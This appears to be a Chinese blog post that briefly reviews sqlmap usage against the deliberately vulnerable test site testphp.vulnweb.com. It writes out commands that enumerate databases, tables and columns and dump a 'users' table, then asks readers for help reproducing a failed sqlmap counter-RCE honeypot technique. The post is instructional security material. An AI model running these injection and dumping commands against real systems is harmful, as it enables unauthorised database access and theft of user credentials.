“线性代数”,这是每个理科生都要学习的课程,听了国科大老师的网课才知道原来正确的翻译应该是“线的代数”,是研究线的代数,而不是研究几何的,原因据说是当年那个人看不懂内容就直译了。反正我当年是云里雾里的,也不知道跟这有没有关系。
=================
进入正题,以下是个关于sqlmap的问题,没明白,求解来着。
先来复习一下,都忘光了。
一、基础命令
1)列出有关现有数据库的信息
–dbs 列出所有可用的数据库。
python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
2)列出有关特定数据库中存在的表的信息
现在使用 -D 指定我们希望访问的数据库的名称,一旦我们有权访问数据库,我们就会想看看我们是否可以访问这些表。为此,我们使用 –tables 查询。在本例中,数据库名称为 acuart。
python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
3)列出有关特定表的列的信息
要查看特定表的列,我们可以使用以下命令,其中我们使用 -T 指定表名,并使用 –columns 查询列名。我们将尝试访问表“users”。
python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -columns
4)转储列中的数据
我们可以逐列转储列的数据,也可以将“用户”表中存在的列全部转储.
python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump
python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump all
二、sqlmap速查表
三、求解sqlmap的反制Rce?
作者的原文在这里《可恶!没想到sqlmap也背叛了脚本小子》。
大致意思就是构造一个蜜罐,他人在sql注入时触发反制,反控对方。具体方法看作者的那篇文章,是21年的一个漏洞,结果如下图:
我按照作者的思路进行了复现,但没有实现,无论是现在的版本还是以前的版本。
现在发出来,请大家参与研究下,并指点我一下。
原文始发于微信公众号(MicroPest):sqlmap的反制复现?求指点
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论